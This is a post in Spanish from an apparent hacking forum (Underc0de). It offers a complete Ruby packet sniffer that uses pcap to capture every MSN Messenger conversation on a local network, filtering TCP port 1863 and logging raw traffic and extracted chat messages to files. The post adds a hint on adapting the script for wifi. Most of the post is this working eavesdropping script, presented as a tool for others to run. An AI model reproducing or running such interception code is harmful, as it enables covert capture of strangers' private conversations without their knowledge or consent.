MSN Sniff

  • 0 Respuestas
  • 1662 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5706
  • Actividad:
    30%
  • Country: ar
  • Reputación 37
  • ANTRAX
  • Skype: underc0de.org
  • Twitter: @Underc0de
    • Ver Perfil
    • Underc0de
    • Email

MSN Sniff

  • en: Febrero 24, 2010, 04:09:29 pm

Se trata de un sniffer. Lo pones a correr y captura todas las conversaciones de msn de la red ^^. Está configurado para lan, el que tenga wifi solo tiene que cambiar el parámetro en al hacer el Pcaplet.new (no lo voy a dar todo hecho xD). Se utiliza la libreria pcap, necesaria instalacion.

Se crean dos archivos: uno con toda la información que pasa por el MSN (puede ser útil) y otro con las conversaciones limpias.

Código: Ruby
  1. #MSN Sniff. Captura las conversaciones de MSN de la red.
  2. #Coded by pRotos.
  3. #[email protected]
  4.  
  5. require 'pcaplet'
  6. include Pcap
  7.  
  8. log=File.open('msnlog.txt', 'w')
  9.  
  10. conv=File.open('conversaciones.txt', 'w')
  11.  
  12. sniff=Pcaplet.new('-s 1500')
  13. filtro=Pcap::Filter.new('tcp and src port 1863', sniff.capture)
  14. filtro1=Pcap::Filter.new('tcp and dst port 1863', sniff.capture)
  15. sniff.add_filter(filtro|filtro1)
  16. sniff.each_packet {|x|
  17.    log.puts x.tcp_data
  18.    puts x.tcp_data
  19.    if filtro =~ x
  20.       if x.tcp_data =~ /X-MMS-IM-Format:\s.*\r\n\r\n(.*)/
  21.          mensaje=$1
  22.          dir=x.tcp_data.split('SG ')[1].split(' ')[0]
  23.          conv.print dir, "=> "
  24.          conv.print mensaje, "\n\n"
  25.       end
  26.  
  27.    end
  28.  
  29.    if filtro1 =~ x
  30.       if x.tcp_data =~ /TypingUser:\s(.*)\r\n/
  31.          dir=$1
  32.          conv.print dir, "=> "
  33.  
  34.          end
  35.       if x.tcp_data =~ /X-MMS-IM-Format:\s.*\r\n\r\n(.*)/
  36.  
  37.          mensaje=$1
  38.          conv.print mensaje, "\n\n"
  39.       end
  40.    end
  41.  
  42.    }
« Última modificación: Julio 31, 2014, 09:46:36 pm por Expermicid »


 

HTTP Sniff

Iniciado por ANTRAX

Respuestas: 0
Vistas: 1633
Último mensaje Febrero 24, 2010, 04:08:55 pm
por ANTRAX